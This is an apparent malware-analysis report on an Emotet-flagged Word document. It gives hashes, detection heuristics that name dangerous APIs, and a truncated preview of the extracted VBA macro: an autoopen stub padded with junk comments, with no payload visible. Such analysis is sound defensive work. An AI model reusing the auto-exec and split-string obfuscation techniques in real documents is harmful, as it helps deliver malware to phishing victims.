Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 101bda0f1be52e9f…

MALICIOUS

Office (OLE)

139.0 KB Created: 2019-05-30 07:59:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 1028bf84498a4e6ea70659ce00be1eb3 SHA-1: ce49aaf2b7882882f45f0907e610cc66bee7faf7 SHA-256: 101bda0f1be52e9f359fde71e23c1da7583d5804ee416dfa6a8f4bfbd697685a
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an autoopen macro, which is a common Emotet infection vector. The script uses obfuscation techniques like splitting keywords and dynamically reassembling API names such as 'Win32_Process'. The presence of an autoopen macro and the CreateObject call strongly suggest the execution of a second-stage payload, likely a downloader. ClamAV also identifies this as Emotet.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10268 bytes
SHA-256: 6fb34152e9a28d7b36d4a1ac433711d5c4eb440fc985bb464b15f5be6245d0af
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V76DlAI, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "q0jjlB, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "IjYqSK, 2, 2, MSForms, ComboBox"
Function HBAIRjmS()
   'Select Case "VH8V3cdH"
        ' Case "PMiWkFI"
           ' Debug.Print  "JXhwVPWq"
           ' Debug.Print  "Urq4szh"
           ' Debug.Print  Tan("d3cWjwhT")
       '  Case "KQv3rA"
           ' Debug.Print  Log("QlFjwpuB")
          '  Debug.Print  "QwjDUND"
          '  Debug.Print  "AAAz8qkn"
'End Select
   'Select Case "tXqN6z"
        ' Case "ARja2S"
           ' Debug.Print  "q5XAVT"
           ' Debug.Print  "EHicT0"
           ' Debug.Print  Tan("fo0wtz7I")
       '  Case "AnYUMLa"
           ' Debug.Print  Log("SO3qjj")
          '  Debug.Print  "pOiwC6"
          '  Debug.Print  "KU9bB9Pl"
'End Select
End Function
Sub _
autoopen( _
)
   'Select Case "M7jj6l"
        ' Case "ZNJAmRQ"
           ' Debug.Print  "Or1icv8"
           ' Debug.Print  "piojj6"
           ' Debug.Print  Tan("G9W9iqQ")
       '  Case "BvqkGkU"
           ' Debug.Print  Log("hrmzKjzm")
          '  Debug.Print  "z9rPPJ"
          '  Debug.Print  "iYwAkE"
'End Select
pW15AUm8
   'Select Case "NYprTur"
        ' Case "Vm0TaW"
           ' Debug.Print  "zwEzzOh"
           ' Debug.Print  "IwwwOj"
           ' Debug.Print  Tan("iDt0kXZA")
       '  Case "TL_YJdr8"
           ' Debug.Print  Log("odKIZL")
          '  Debug.Print  "uULGRWvS"
          '  Debug.Print  "VYpwEfJ"
'End Select
End Sub
Function jSGRJXKM()
   'Select Case "R_MfLn"
        ' Case "XFcrMhXf"
           ' Debug.Print  "jHHjqhGR"
           ' Debug.Print  "L_vKfspl"
           ' Debug.Print  Tan("YViMCD")
       '  Case "mMzL6Dji"
           ' Debug.Print  Log("QpZ6cjwc")
          '  Debug.Print  "Ki4whE"
          '  Debug.Print  "d6hnOS"
'End Select
   'Select Case "jQq4XO"
        ' Case "FVok4qL"
           ' Debug.Print  "jMFVbUU"
           ' Debug.Print  "cFwWtTz"
           ' Debug.Print  Tan("GzvXJtU")
       '  Case "S6Vmj_M"
           ' Debug.Print  Log("r3O8VT8r")
          '  Debug.Print  "mmVwoOD"
          '  Debug.Print  "PDWBXu0"
'End Select
End Function


Attribute VB_Name = "acj6Q3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "L1GBjY"

Attribute VB_Name = "P7MZw5"

Attribute VB_Name = "bGTH6iV"

Attribute VB_Name = "cwlrOmD"

Attribute VB_Name = "z7qr4O"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "PAHD56"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "KTqMUs"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ouH3it"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.